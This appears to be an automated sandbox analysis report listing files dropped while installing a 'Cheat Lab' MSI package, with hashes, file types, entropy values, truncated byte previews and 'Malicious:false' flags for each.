                                                          Preview:{"tasks":"OTMsYjQsOTIsYWMsYjMsNTMsODgsOGMsODMsODYsOWQsODAsN2EsODksY2UsYTEsYjIsZGYsN2MsYTcsNmIsOTksYWIsYTgsYTYsYjEsYzQsOWQsODQsOTQsYmIsYWEsYTYsNjcsZDQsYWMsYzIsOTQsYmQsZGUsYjAsYjMsZGIsYzQsODgsY2EsZDEsYTUsNzMsZDUsY2UsZTEsYWMsZGEsYWIsYTEsOTcsYWYsYzUsZDYsODQsOTYsODksN2YsNmMsNmUsYTgsNzgsODcsNjYsODcsYTAsN2MsODYsYTAsOGQsOTMsOWEsOTgsNmYsNzMsYTUsOGIsYTYsN2YsYWMsN2IsNjksNmIsNzEsODYsOTcsODcsOTUsOGIsNzgsNjgsNzAsYTgsN2IsN2UsNjMsNzAsOTgsNmMsNzQsZDEsYmQsYzYsY2MsYzEsYTgsYTUsZTgsYzIsOGYsODUsOTcsNjUsNzUsYTIsYjEsOTUsYzQsYzksYzYsN2EsNzIsNTgsNWIsZDYsYWMsYmIsOTYsYWQsZGEsYWQsYmYsZDAsNzYsOTQsODcsODQsN2MsYWQsZTcsYmQsZGMsYmQsZGIsOWYsOTAsODUsYTYsYzUsZDcsYmUsZDMsYmYsYjksOTQsOTUsZDMsYjIsYmQsOWYsYjMsY2YsYzAsODAsZDAsY2MsYmYsODksOGUsNTgsNjYsZTcsY2UsY2UsYmQsZWIsNjUsNmUsNTIsNzIsN2QsODMsNzcsYzYsY2QsYmEsYTcsYWIsZTUsYjEsNzEsNmIsNmUsOWMsNzgsNzIsOGQsYzYsYmYsZDMsYzMsYWQsYjIsZDcsYzIsOGYsODUsOTcsNzMsNjAsNTIsNjMsYjksY2MsYjksY2EsN2EsODAsNTgsNjksOWMsNjMsNzEsYTEsYzMsZDksYmMsNzQsYTUsNzQsZDUsODksZDUsYTEsYmUsZDksN2MsYTcsNmIsYTgsNzMsNj

                                                          C:\Windows\Installer\6d055c.msi

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {CC73A368-D6F6-4385-86EB-175FBE031BB5}, Number of Words: 2, Subject: Cheat Lab, Author: Cheat Lab Inc., Name of Creating Application: Cheat Lab, Template: x64;1033, Comments: This installer database contains the logic and data required to install Cheat Lab., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                          Category:dropped
                                                          Size (bytes):3107840
                                                          Entropy (8bit):6.956854788632149
                                                          Encrypted:false
                                                          SSDEEP:49152:hAKMMZKumZrWq4Fb6HXr1iWnYs4ntHurpllQ6aruxtZyTreUuyZD6lvVz94OCPTG:NKqFnWneuxqTgvVWvPDNUl
                                                          MD5:9014ACFCA65FCA4BDF8B5F561C4A1783
                                                          SHA1:C8FCDEFB8BA4F700801FC0E97811661FA972DE30
                                                          SHA-256:EFEA578CDAC3D52601D43B6C4570D94E8FCBDD701573B33612551050E8246CD2
                                                          SHA-512:B3BD5542E0CE2F8B17E8DA95B2E1D24B00A7517E707BB20DFCC0C33C5A210CA73AA5D52A83D24CFE0E8A7D7F05B93047D561F0F62898457F7FD0801B44C7FBC5
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:......................>...................0...................................[.......[...................................................................................................................................................................................................................................................................................................................................................................................................................................................U...........#...0............................................................................................... ...!...".../...$.......&...'...(...)...*...+...,...-.......6...1...C...2...3...4...5...8...7...?...9...:...;...<...=...>...B...@...A...T...P...D...E...F...G...H...O...J...K...L...M...N...O...P...Q...R...S.......V...q...W...X...Y...Z...........]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                          C:\Windows\Installer\MSI4E34.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):191968
                                                          Entropy (8bit):6.4059654303545885
                                                          Encrypted:false
                                                          SSDEEP:3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
                                                          MD5:F11E8EC00DFD2D1344D8A222E65FEA09
                                                          SHA1:235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
                                                          SHA-256:775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
                                                          SHA-512:6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\MSI4F2F.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:modified
                                                          Size (bytes):446944
                                                          Entropy (8bit):6.403916470886214
                                                          Encrypted:false
                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\MSI695.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):446944
                                                          Entropy (8bit):6.403916470886214
                                                          Encrypted:false
                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\MSI713.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):446944
                                                          Entropy (8bit):6.403916470886214
                                                          Encrypted:false
                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\MSI743.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):446944
                                                          Entropy (8bit):6.403916470886214
                                                          Encrypted:false
                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\MSI773.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):446944
                                                          Entropy (8bit):6.403916470886214
                                                          Encrypted:false
                                                          SSDEEP:6144:5x0A4eCDsgvSd7ftYx5fnLHT7ybjfgaUFfQiAOuv2IaZeB+:5x0ECIgYOx5fnL/tYi8OBZr
                                                          MD5:475D20C0EA477A35660E3F67ECF0A1DF
                                                          SHA1:67340739F51E1134AE8F0FFC5AE9DD710E8E3A08
                                                          SHA-256:426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                                                          SHA-512:99525AAAB2AB608134B5D66B5313E7FC3C2E2877395C5C171897D7A6C66EFB26B606DE1A4CB01118C2738EA4B6542E4EB4983E631231B3F340BF85E509A9589E
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$..........0...c...c...c...b...c...bZ..c...b...c...b...c...b...c...b...c...b...c...b...c...c...cF..b...cF..b...cF..c...c..{c...cF..b...cRich...c........................PE..L....;.a.........."!.....t...P......'.....................................................@.........................PK......$S..........0........................L......p...............................@...............4............................text....r.......t.................. ..`.rdata..@............x..............@..@.data....!...p.......R..............@....rsrc...0............d..............@..@.reloc...L.......N...j..............@..B........................................................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\MSI7D1.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):386047
                                                          Entropy (8bit):6.411221173890974
                                                          Encrypted:false
                                                          SSDEEP:6144:5BKwXYBWHRuEFW9RzLLhrUmdHDZ19MhpBKwXYBWHRuEFW9RzLLhrUmdHDZ19MhK:+aHRuEs3Xmm9DZEwaHRuEs3Xmm9DZE4
                                                          MD5:DA90D7FF318173198360F78A8C69314A
                                                          SHA1:E78FD996261AD71058780FD4478608772E67478E
                                                          SHA-256:EDE72C5F817CFE2F33B5C125F8EE594DE8FA5DC8D812143DCBD04E72CCFDD189
                                                          SHA-512:DD42F55FDEB7EF94789EED6C7FC7892BA9C2A9E5DD4B3E19F60F51DB83350315E5119D6F1CD4DE762D7E6E09B910D8D9E09F05F19D3C04E7732AD33D5D55F5A2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:...@IXOS.@.....@..,X.@.....@.....@.....@.....@.....@......&.{E0E46653-343B-4459-B5BD-ED25C554CD5C}..Cheat Lab..Cheat.Lab.2.7.2.msi.@.....@.....@.....@........&.{CC73A368-D6F6-4385-86EB-175FBE031BB5}.....@.....@.....@.....@.......@.....@.....@.......@......Cheat Lab......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{F1DA0363-909C-400E-A21B-7B2D5946B577}/.C:\Program Files\Cheat Lab Inc\Cheat Lab\config.@.......@.....@.....@......&.{630AA01D-F530-4CBA-8FD1-AF202D37234B}5.C:\Program Files\Cheat Lab Inc\Cheat Lab\compiler.exe.@.......@.....@.....@........AI_RollbackTasks21.Rolling back scheduled task on the local computer..Task Name: [1]J...AI_RollbackTasks2.@.-........MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...

                                                          C:\Windows\Installer\MSI7E2.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):191968
                                                          Entropy (8bit):6.4059654303545885
                                                          Encrypted:false
                                                          SSDEEP:3072:TM6KwXYKcWHBnqA2L6vFW90Y+y3jS6LhrZe6benANHPPDZ1D5GvEOiF:TBKwXYBWHRuEFW9RzLLhrUmdHDZ19Mh0
                                                          MD5:F11E8EC00DFD2D1344D8A222E65FEA09
                                                          SHA1:235ED90CC729C50EB6B8A36EBCD2CF044A2D8B20
                                                          SHA-256:775037D6D7DE214796F2F5850440257AE7F04952B73538DA2B55DB45F3B26E93
                                                          SHA-512:6163DD8FD18B4520D7FDA0986A80F2E424FE55F5D65D67F5A3519A366E53049F902A08164EA5669476100B71BB2F0C085327B7C362174CB7A051D268F10872D3
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A..QA..QA..Q...PK..Q...P..Q...PP..Q...PR..Q...PW..Q...Pu..Q...P@..Q...PP..QA..Q...Q...PY..Q...P@..Q...Q@..QA..Q@..Q...P@..QRichA..Q................PE..L....;.a.........."!................'........ ......................................O.....@.................................X...x.......x...........................ty..p....................z.......$..@............ .........@....................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\MSI841.tmp

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):588768
                                                          Entropy (8bit):6.567039334307586
                                                          Encrypted:false
                                                          SSDEEP:12288:LBX/lKyuDvn4SsWPbV5BPsahK7RcekeUuyZD6WGvzQ5VEPL2Ra3D:x12h2SekeUuyZD6lvs0zqa3
                                                          MD5:7B7D9E2C9B8236E7155F2F97254CB40E
                                                          SHA1:99621FC9D14511428D62D91C31865FB2C4625663
                                                          SHA-256:DF58FABA241328B9645DCB5DEC387EC5EDD56E2D878384A4783F2C0A66F85897
                                                          SHA-512:FBAA1560F03255F73BE3E846959E4B7CBB1C24165D014ED01245639ADD6CC463975E5558567AB5704E18C9078A8A071C9E38DC1E499BA6E3DC507D4275B4A228
                                                          Malicious:false
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                          Reputation:unknown
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...Z.J.Z.J.Z.Jj(.K.Z.Jj(.K.Z.Jj(.K.Z.J./.K.Z.J./.K.Z.J.. J.Z.J./.K.Z.Jj(.K.Z.J.Z.J.[.J./.K.Z.J./.K.Z.J./"J.Z.J.ZJJ.Z.J./.K.Z.JRich.Z.J................PE..L....<.a.........."!.........Z............................................... .......Q....@......................... o.......o...................................T......p...................@.......h...@...............L............................text...h........................... ..`.rdata..L...........................@..@.data................j..............@....rsrc...............................@..@.reloc...T.......V..................@..B................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\SourceHash{E0E46653-343B-4459-B5BD-ED25C554CD5C}

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):1.166620606681732
                                                          Encrypted:false
                                                          SSDEEP:12:JSbX72FjWiAGiLIlHVRp+h/7777777777777777777777777vDHFcc+uWN1l0i8Q:JTQI5WScWyF
                                                          MD5:8480D1B6F4551288B0CB164A7D59F21D
                                                          SHA1:1D7D78AF0374EAB9012568684DEE12677597ECF4
                                                          SHA-256:5B15AC9A3FB254D35F1E7D6B297CCBC1D3B6A9A91B9BEC53EBB78970CF0E8565
                                                          SHA-512:90F4517B49EF71C9ACBF277C03732A78924061B338869B2AC140B05A4D6EC08A287A70E52EFF8CC5FCCEABCED6871B35EFED74DBEBF3460349B996A1E488F1A8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Installer\inprogressinstallinfo.ipi

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):1.5896998966353775
                                                          Encrypted:false
                                                          SSDEEP:48:X8PhXuRc06WXJunT5ZWZNDcdWQSkdWbVAEkrCy9oYoxMWdW9SkdW/TDS:WhX1FnTXWpa+eRCk
                                                          MD5:A2EF02B9D0332ABC9BC7FF8CBF714057
                                                          SHA1:17B92D0F80CF9AB3661C37DDFE1F29D1DA2DBBA2
                                                          SHA-256:EF8ABA13AD4D0550ECB54EB1617C3188E067AB13D28212B4B766AE80F21D94BB
                                                          SHA-512:E6D8BF3C5DEB2F671D1EA2C3DCDF5D162410899F28F034B2790AC4465FC1F8DFE671DA4DABEDB7728B75904EB4F370FF9307A65F4E794F524E7AE528263AB582
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):432221
                                                          Entropy (8bit):5.3751674775646805
                                                          Encrypted:false
                                                          SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgauc:zTtbmkExhMJCIpEr9
                                                          MD5:54F519A38E9D593E2FDBABABE01BEDDC
                                                          SHA1:3281BBFFB8913DFCDDAC77EF4ACF8C0B6C7F88FE
                                                          SHA-256:0100BD031D68160FEF46B10F99D09720EAB188BBDFFC0556F5B833BF41F9AB7D
                                                          SHA-512:FBF5E047356D573ECDBE53D9FE5C16363FB8ABED16AF6117E9424D661366F9DDF388E61A4A6E9F62CDF74187B22B7FC1668481CC7D3B340342613FBEDD4EBEAF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [

                                                          C:\Windows\Temp\~DF21E451E8053B38A2.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DF460544FE7D33D3B0.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):1.271549551248805
                                                          Encrypted:false
                                                          SSDEEP:48:CQoPuWrM+CFXJNT58vWZNDcdWQSkdWbVAEkrCy9oYoxMWdW9SkdW/TDS:CRPglTmvWpa+eRCk
                                                          MD5:BD0B171CF613663EA0AA7C1C33FA4B31
                                                          SHA1:483639416BAF529881FAFFC6BBAE490D9555C254
                                                          SHA-256:4B9B46B13029D7AF90DACD0B921147CBBAF5DCAC0E9CED48F89EF87035A8FB81
                                                          SHA-512:77320B5B0AC79051073703BFD7EF515EA0E3F1F130C1D353D42C52202168D93071C8B0C2C732265B690A5C21CC71127A6611C8EE9B4FE9B5D57533A5E92F74CF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DF59A761325092CB6E.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):1.271549551248805
                                                          Encrypted:false
                                                          SSDEEP:48:CQoPuWrM+CFXJNT58vWZNDcdWQSkdWbVAEkrCy9oYoxMWdW9SkdW/TDS:CRPglTmvWpa+eRCk
                                                          MD5:BD0B171CF613663EA0AA7C1C33FA4B31
                                                          SHA1:483639416BAF529881FAFFC6BBAE490D9555C254
                                                          SHA-256:4B9B46B13029D7AF90DACD0B921147CBBAF5DCAC0E9CED48F89EF87035A8FB81
                                                          SHA-512:77320B5B0AC79051073703BFD7EF515EA0E3F1F130C1D353D42C52202168D93071C8B0C2C732265B690A5C21CC71127A6611C8EE9B4FE9B5D57533A5E92F74CF
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DF660F76FBD8792B70.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:Composite Document File V2 Document, Cannot read section info
                                                          Category:dropped
                                                          Size (bytes):20480
                                                          Entropy (8bit):1.5896998966353775
                                                          Encrypted:false
                                                          SSDEEP:48:X8PhXuRc06WXJunT5ZWZNDcdWQSkdWbVAEkrCy9oYoxMWdW9SkdW/TDS:WhX1FnTXWpa+eRCk
                                                          MD5:A2EF02B9D0332ABC9BC7FF8CBF714057
                                                          SHA1:17B92D0F80CF9AB3661C37DDFE1F29D1DA2DBBA2
                                                          SHA-256:EF8ABA13AD4D0550ECB54EB1617C3188E067AB13D28212B4B766AE80F21D94BB
                                                          SHA-512:E6D8BF3C5DEB2F671D1EA2C3DCDF5D162410899F28F034B2790AC4465FC1F8DFE671DA4DABEDB7728B75904EB4F370FF9307A65F4E794F524E7AE528263AB582
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DF9AACB897C4BD8222.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DFA7CE67A3C254AF4D.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):32768
                                                          Entropy (8bit):0.07360530666972447
                                                          Encrypted:false
                                                          SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOcc+SZlP+crkKVky6l1:2F0i8n0itFzDHFcc+uWN1
                                                          MD5:F2FABD277E90C92B9B409258F6111324
                                                          SHA1:D0BA397C673950B1938547DCDCEF366D9B9790E5
                                                          SHA-256:66D51F73CEB390B4B5BFA4A18ECF9B7AD7D710B2D973C5B6BB0F52E365DA4658
                                                          SHA-512:B5E987FC7AC4F818CEA448A6DAECBC21CFB636EC01868B040E41B3914FB54BF70B46E118BB9ED8762FAABEF178C222805993CF45908007D211F986A904C2B252
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                          C:\Windows\Temp\~DFBE1F5DC23057242A.TMP

                                                          Download File
                                                          Process:C:\Windows\System32\msiexec.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):512
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3::
                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                          Malicious:false
                                                          Reputation:unknown
